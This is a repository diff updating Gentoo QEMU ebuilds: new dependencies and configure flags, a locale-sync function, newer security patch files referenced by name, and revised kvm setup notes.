>=app-emulation/spice-0.12.0[static-libs(+)] >=app-emulation/spice-0.12.0[static-libs(+)]
) )
ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] ) ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] )
tls? ( net-libs/gnutls[static-libs(+)] )
usb? ( >=virtual/libusb-1-r2[static-libs(+)] ) usb? ( >=virtual/libusb-1-r2[static-libs(+)] )
usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] ) usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] )
uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] ) uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] )
vde? ( net-misc/vde[static-libs(+)] ) vde? ( net-misc/vde[static-libs(+)] )
virgl? ( media-libs/virglrenderer[static-libs(+)] )
virtfs? ( sys-libs/libcap ) virtfs? ( sys-libs/libcap )
xfs? ( sys-fs/xfsprogs[static-libs(+)] )" xfs? ( sys-fs/xfsprogs[static-libs(+)] )"
USER_LIB_DEPEND="${COMMON_LIB_DEPEND}" USER_LIB_DEPEND="${COMMON_LIB_DEPEND}"
@ -150,7 +159,7 @@ CDEPEND="
qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} ) qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} )
python? ( ${PYTHON_DEPS} ) python? ( ${PYTHON_DEPS} )
systemtap? ( dev-util/systemtap ) systemtap? ( dev-util/systemtap )
xen? ( app-emulation/xen-tools )" xen? ( app-emulation/xen-tools:= )"
DEPEND="${CDEPEND} DEPEND="${CDEPEND}
dev-lang/perl dev-lang/perl
=dev-lang/python-2* =dev-lang/python-2*
@ -205,11 +214,14 @@ QA_WX_LOAD="usr/bin/qemu-i386
DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure
you have the kernel module loaded before running kvm. The easiest way to you have the kernel module loaded before running kvm. The easiest way to
ensure that the kernel module is loaded is to load it on boot.\n ensure that the kernel module is loaded is to load it on boot.\n
For AMD CPUs the module is called 'kvm-amd'\n For AMD CPUs the module is called 'kvm-amd'.\n
For Intel CPUs the module is called 'kvm-intel'\n For Intel CPUs the module is called 'kvm-intel'.\n
Please review /etc/conf.d/modules for how to load these\n\n Please review /etc/conf.d/modules for how to load these.\n\n
Make sure your user is in the 'kvm' group\n Make sure your user is in the 'kvm' group\n
Just run 'gpasswd -a <USER> kvm', then have <USER> re-login." Just run 'gpasswd -a <USER> kvm', then have <USER> re-login.\n\n
For brand new installs, the default permissions on /dev/kvm might not let you
access it. You can tell udev to reset ownership/perms:\n
udevadm trigger -c add /dev/kvm"
qemu_support_kvm() { qemu_support_kvm() {
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \ if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \
@ -288,6 +300,29 @@ check_targets() {
popd >/dev/null popd >/dev/null
} }
handle_locales() {
# Make sure locale list is kept up-to-date.
local detected sorted
detected=$(echo $(cd po && printf '%s\n' *.po | grep -v messages.po | sed 's:.po$::' | sort -u))
sorted=$(echo $(printf '%s\n' ${PLOCALES} | sort -u))
if [[ ${sorted} != "${detected}" ]] ; then
eerror "The ebuild needs to be kept in sync."
eerror "PLOCALES: ${sorted}"
eerror " po/*.po: ${detected}"
die "sync PLOCALES"
fi
# Deal with selective install of locales.
if use nls ; then
# Delete locales the user does not want. #577814
rm_loc() { rm po/$1.po || die; }
l10n_for_each_disabled_locale_do rm_loc
else
# Cheap hack to disable gettext .mo generation.
rm -f po/*.po
fi
}
src_prepare() { src_prepare() {
check_targets IUSE_SOFTMMU_TARGETS softmmu check_targets IUSE_SOFTMMU_TARGETS softmmu
check_targets IUSE_USER_TARGETS linux-user check_targets IUSE_USER_TARGETS linux-user
@ -297,21 +332,17 @@ src_prepare() {
-e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \ -e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \
Makefile Makefile.target || die Makefile Makefile.target || die
# Cheap hack to disable gettext .mo generation. epatch "${FILESDIR}"/qemu-2.5.0-cflags.patch
use nls || rm -f po/*.po
epatch "${FILESDIR}"/qemu-1.7.0-cflags.patch
epatch "${FILESDIR}"/${PN}-2.4.0-block-mirror-crash.patch #558396
epatch "${FILESDIR}"/${PN}-2.4.0-CVE-2015-7295-{1,2,3}.patch #560760
epatch "${FILESDIR}"/${PN}-2.4.0-CVE-2015-6855.patch #560422
[[ -n ${BACKPORTS} ]] && \ [[ -n ${BACKPORTS} ]] && \
EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \ EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \
epatch epatch
# MIPS specific fixes. Bug #563162 epatch "${FILESDIR}"/${PN}-2.5.0-CVE-2016-2198.patch #573314
for x in "${FILESDIR}"/${PN}-2.4-mips-*; do epatch "${FILESDIR}"/${PN}-2.5.0-rng-stack-corrupt-{0,1,2,3}.patch #576420
epatch "${x}" epatch "${FILESDIR}"/${PN}-2.5.1-stellaris_enet-overflow.patch #579614
done epatch "${FILESDIR}"/${PN}-2.5.1-CVE-2016-4020.patch #580040
epatch "${FILESDIR}"/${PN}-2.5.1-CVE-2015-8558.patch #568246 #580426
epatch "${FILESDIR}"/${PN}-2.5.0-sysmacros.patch
# Fix ld and objcopy being called directly # Fix ld and objcopy being called directly
tc-export AR LD OBJCOPY tc-export AR LD OBJCOPY
@ -320,6 +351,9 @@ src_prepare() {
MAKEOPTS+=" V=1" MAKEOPTS+=" V=1"
epatch_user epatch_user
# Run after we've applied all patches.
handle_locales
} }
## ##
@ -344,6 +378,11 @@ qemu_src_configure() {
--disable-guest-agent --disable-guest-agent
--disable-strip --disable-strip
--disable-werror --disable-werror
# We support gnutls/nettle for crypto operations. It is possible
# to use gcrypt when gnutls/nettle are disabled (but not when they
# are enabled), but it's not really worth the hassle. Disable it
# all the time to avoid automatically detecting it. #568856
--disable-gcrypt
--python="${PYTHON}" --python="${PYTHON}"
--cc="$(tc-getCC)" --cc="$(tc-getCC)"
--cxx="$(tc-getCXX)" --cxx="$(tc-getCXX)"
@ -372,6 +411,8 @@ qemu_src_configure() {
$(conf_softmmu curl) $(conf_softmmu curl)
$(conf_softmmu fdt) $(conf_softmmu fdt)
$(conf_softmmu glusterfs) $(conf_softmmu glusterfs)
$(conf_softmmu gnutls)
$(conf_softmmu gnutls nettle)
$(conf_softmmu gtk) $(conf_softmmu gtk)
$(conf_softmmu infiniband rdma) $(conf_softmmu infiniband rdma)
$(conf_softmmu iscsi libiscsi) $(conf_softmmu iscsi libiscsi)
@ -387,16 +428,16 @@ qemu_src_configure() {
$(conf_softmmu sasl vnc-sasl) $(conf_softmmu sasl vnc-sasl)
$(conf_softmmu sdl) $(conf_softmmu sdl)
$(conf_softmmu seccomp) $(conf_softmmu seccomp)
$(conf_softmmu smartcard smartcard-nss) $(conf_softmmu smartcard)
$(conf_softmmu snappy) $(conf_softmmu snappy)
$(conf_softmmu spice) $(conf_softmmu spice)
$(conf_softmmu ssh libssh2) $(conf_softmmu ssh libssh2)
$(conf_softmmu tls vnc-tls)
$(conf_softmmu usb libusb) $(conf_softmmu usb libusb)
$(conf_softmmu usbredir usb-redir) $(conf_softmmu usbredir usb-redir)
$(conf_softmmu uuid) $(conf_softmmu uuid)
$(conf_softmmu vde) $(conf_softmmu vde)
$(conf_softmmu vhost-net) $(conf_softmmu vhost-net)
$(conf_softmmu virgl virglrenderer)
$(conf_softmmu virtfs) $(conf_softmmu virtfs)
$(conf_softmmu vnc) $(conf_softmmu vnc)
$(conf_softmmu vte) $(conf_softmmu vte)
@ -570,12 +611,12 @@ src_install() {
doins "${FILESDIR}/bridge.conf" doins "${FILESDIR}/bridge.conf"
# Remove the docdir placed qmp-commands.txt # Remove the docdir placed qmp-commands.txt
mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/qmp/" mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/" || die
cd "${S}" cd "${S}"
dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt
newdoc pc-bios/README README.pc-bios newdoc pc-bios/README README.pc-bios
dodoc docs/qmp/*.txt dodoc docs/qmp-*.txt
if [[ -n ${softmmu_targets} ]]; then if [[ -n ${softmmu_targets} ]]; then
# Remove SeaBIOS since we're using the SeaBIOS packaged one # Remove SeaBIOS since we're using the SeaBIOS packaged one
@ -629,10 +670,6 @@ pkg_postinst() {
fi fi
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
if use virtfs && [ -n "${softmmu_targets}" ]; then
local virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
fi
} }
pkg_info() { pkg_info() {

64
sdk_container/src/third_party/portage-stable/app-emulation/qemu/qemu-9999.ebuild vendored
View File

@ -7,8 +7,10 @@ EAPI=5
PYTHON_COMPAT=( python2_7 ) PYTHON_COMPAT=( python2_7 )
PYTHON_REQ_USE="ncurses,readline" PYTHON_REQ_USE="ncurses,readline"
PLOCALES="de_DE fr_FR hu it tr zh_CN"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \ inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils user udev fcaps readme.gentoo pax-utils l10n
BACKPORTS= BACKPORTS=
@ -34,7 +36,7 @@ kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
+png pulseaudio python \ +png pulseaudio python \
rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu
static-user systemtap tci test +threads usb usbredir +uuid vde +vhost-net \ static-user systemtap tci test +threads usb usbredir +uuid vde +vhost-net \
virtfs +vnc vte xattr xen xfs" virgl virtfs +vnc vte xattr xen xfs"
COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips
mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32 mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32
@ -123,7 +125,7 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
) )
) )
seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] ) seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] )
smartcard? ( dev-libs/nss !app-emulation/libcacard ) smartcard? ( >=app-emulation/libcacard-2.5.0[static-libs(+)] )
snappy? ( app-arch/snappy[static-libs(+)] ) snappy? ( app-arch/snappy[static-libs(+)] )
spice? ( spice? (
>=app-emulation/spice-protocol-0.12.3 >=app-emulation/spice-protocol-0.12.3
@ -134,6 +136,7 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] ) usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] )
uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] ) uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] )
vde? ( net-misc/vde[static-libs(+)] ) vde? ( net-misc/vde[static-libs(+)] )
virgl? ( media-libs/virglrenderer[static-libs(+)] )
virtfs? ( sys-libs/libcap ) virtfs? ( sys-libs/libcap )
xfs? ( sys-fs/xfsprogs[static-libs(+)] )" xfs? ( sys-fs/xfsprogs[static-libs(+)] )"
USER_LIB_DEPEND="${COMMON_LIB_DEPEND}" USER_LIB_DEPEND="${COMMON_LIB_DEPEND}"
@ -156,7 +159,7 @@ CDEPEND="
qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} ) qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} )
python? ( ${PYTHON_DEPS} ) python? ( ${PYTHON_DEPS} )
systemtap? ( dev-util/systemtap ) systemtap? ( dev-util/systemtap )
xen? ( app-emulation/xen-tools )" xen? ( app-emulation/xen-tools:= )"
DEPEND="${CDEPEND} DEPEND="${CDEPEND}
dev-lang/perl dev-lang/perl
=dev-lang/python-2* =dev-lang/python-2*
@ -211,11 +214,14 @@ QA_WX_LOAD="usr/bin/qemu-i386
DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure
you have the kernel module loaded before running kvm. The easiest way to you have the kernel module loaded before running kvm. The easiest way to
ensure that the kernel module is loaded is to load it on boot.\n ensure that the kernel module is loaded is to load it on boot.\n
For AMD CPUs the module is called 'kvm-amd'\n For AMD CPUs the module is called 'kvm-amd'.\n
For Intel CPUs the module is called 'kvm-intel'\n For Intel CPUs the module is called 'kvm-intel'.\n
Please review /etc/conf.d/modules for how to load these\n\n Please review /etc/conf.d/modules for how to load these.\n\n
Make sure your user is in the 'kvm' group\n Make sure your user is in the 'kvm' group\n
Just run 'gpasswd -a <USER> kvm', then have <USER> re-login." Just run 'gpasswd -a <USER> kvm', then have <USER> re-login.\n\n
For brand new installs, the default permissions on /dev/kvm might not let you
access it. You can tell udev to reset ownership/perms:\n
udevadm trigger -c add /dev/kvm"
qemu_support_kvm() { qemu_support_kvm() {
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \ if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \
@ -294,6 +300,29 @@ check_targets() {
popd >/dev/null popd >/dev/null
} }
handle_locales() {
# Make sure locale list is kept up-to-date.
local detected sorted
detected=$(echo $(cd po && printf '%s\n' *.po | grep -v messages.po | sed 's:.po$::' | sort -u))
sorted=$(echo $(printf '%s\n' ${PLOCALES} | sort -u))
if [[ ${sorted} != "${detected}" ]] ; then
eerror "The ebuild needs to be kept in sync."
eerror "PLOCALES: ${sorted}"
eerror " po/*.po: ${detected}"
die "sync PLOCALES"
fi
# Deal with selective install of locales.
if use nls ; then
# Delete locales the user does not want. #577814
rm_loc() { rm po/$1.po || die; }
l10n_for_each_disabled_locale_do rm_loc
else
# Cheap hack to disable gettext .mo generation.
rm -f po/*.po
fi
}
src_prepare() { src_prepare() {
check_targets IUSE_SOFTMMU_TARGETS softmmu check_targets IUSE_SOFTMMU_TARGETS softmmu
check_targets IUSE_USER_TARGETS linux-user check_targets IUSE_USER_TARGETS linux-user
@ -303,10 +332,7 @@ src_prepare() {
-e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \ -e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \
Makefile Makefile.target || die Makefile Makefile.target || die
# Cheap hack to disable gettext .mo generation. epatch "${FILESDIR}"/qemu-2.5.0-cflags.patch
use nls || rm -f po/*.po
epatch "${FILESDIR}"/qemu-1.7.0-cflags.patch
[[ -n ${BACKPORTS} ]] && \ [[ -n ${BACKPORTS} ]] && \
EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \ EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \
epatch epatch
@ -318,6 +344,9 @@ src_prepare() {
MAKEOPTS+=" V=1" MAKEOPTS+=" V=1"
epatch_user epatch_user
# Run after we've applied all patches.
handle_locales
} }
## ##
@ -342,6 +371,11 @@ qemu_src_configure() {
--disable-guest-agent --disable-guest-agent
--disable-strip --disable-strip
--disable-werror --disable-werror
# We support gnutls/nettle for crypto operations. It is possible
# to use gcrypt when gnutls/nettle are disabled (but not when they
# are enabled), but it's not really worth the hassle. Disable it
# all the time to avoid automatically detecting it. #568856
--disable-gcrypt
--python="${PYTHON}" --python="${PYTHON}"
--cc="$(tc-getCC)" --cc="$(tc-getCC)"
--cxx="$(tc-getCXX)" --cxx="$(tc-getCXX)"
@ -371,6 +405,7 @@ qemu_src_configure() {
$(conf_softmmu fdt) $(conf_softmmu fdt)
$(conf_softmmu glusterfs) $(conf_softmmu glusterfs)
$(conf_softmmu gnutls) $(conf_softmmu gnutls)
$(conf_softmmu gnutls nettle)
$(conf_softmmu gtk) $(conf_softmmu gtk)
$(conf_softmmu infiniband rdma) $(conf_softmmu infiniband rdma)
$(conf_softmmu iscsi libiscsi) $(conf_softmmu iscsi libiscsi)
@ -395,6 +430,7 @@ qemu_src_configure() {
$(conf_softmmu uuid) $(conf_softmmu uuid)
$(conf_softmmu vde) $(conf_softmmu vde)
$(conf_softmmu vhost-net) $(conf_softmmu vhost-net)
$(conf_softmmu virgl virglrenderer)
$(conf_softmmu virtfs) $(conf_softmmu virtfs)
$(conf_softmmu vnc) $(conf_softmmu vnc)
$(conf_softmmu vte) $(conf_softmmu vte)
@ -627,10 +663,6 @@ pkg_postinst() {
fi fi
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
if use virtfs && [ -n "${softmmu_targets}" ]; then
local virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
fi
} }
pkg_info() { pkg_info() {

14
sdk_container/src/third_party/portage-stable/metadata/md5-cache/app-emulation/qemu-2.3.0-r5 vendored
View File

File diff suppressed because one or more lines are too long

14
sdk_container/src/third_party/portage-stable/metadata/md5-cache/app-emulation/qemu-2.3.0-r6 vendored
View File

File diff suppressed because one or more lines are too long

14
sdk_container/src/third_party/portage-stable/metadata/md5-cache/app-emulation/qemu-2.3.1 vendored
View File

File diff suppressed because one or more lines are too long

14
sdk_container/src/third_party/portage-stable/metadata/md5-cache/app-emulation/qemu-2.4.0-r1 vendored
View File

File diff suppressed because one or more lines are too long

14
sdk_container/src/third_party/portage-stable/metadata/md5-cache/app-emulation/qemu-2.4.0.1 vendored
View File

File diff suppressed because one or more lines are too long

14
sdk_container/src/third_party/portage-stable/metadata/md5-cache/app-emulation/qemu-2.4.0.1-r1 vendored
View File

File diff suppressed because one or more lines are too long

14
sdk_container/src/third_party/portage-stable/metadata/md5-cache/app-emulation/qemu-2.4.1 vendored
View File

File diff suppressed because one or more lines are too long

14
sdk_container/src/third_party/portage-stable/metadata/md5-cache/app-emulation/qemu-2.5.0-r2 vendored Normal file
View File

File diff suppressed because one or more lines are too long

14
sdk_container/src/third_party/portage-stable/metadata/md5-cache/app-emulation/qemu-2.5.0-r3 vendored Normal file
View File

File diff suppressed because one or more lines are too long

14
sdk_container/src/third_party/portage-stable/metadata/md5-cache/app-emulation/qemu-2.5.1 vendored Normal file
View File

File diff suppressed because one or more lines are too long

10
sdk_container/src/third_party/portage-stable/metadata/md5-cache/app-emulation/qemu-9999 vendored
View File

File diff suppressed because one or more lines are too long